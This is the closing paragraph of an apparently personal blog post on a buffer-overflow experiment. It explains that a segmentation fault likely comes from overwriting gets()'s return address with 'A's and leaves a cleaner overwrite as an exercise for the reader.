It should be noted that the segmentation fault occurs likely because I am overwriting the return address for the gets() function’s stack frame with “A”s/”0x41″s. If you wanted to be more careful, you could examine the memory while stepping through a debugger, properly overwrite the return address, and cause the program to exit normally. I’ll leave that as an exercise to the reader…if there are any :-).  I hope this is as informative to anyone that reads it as it was to me to have to think it through and write it.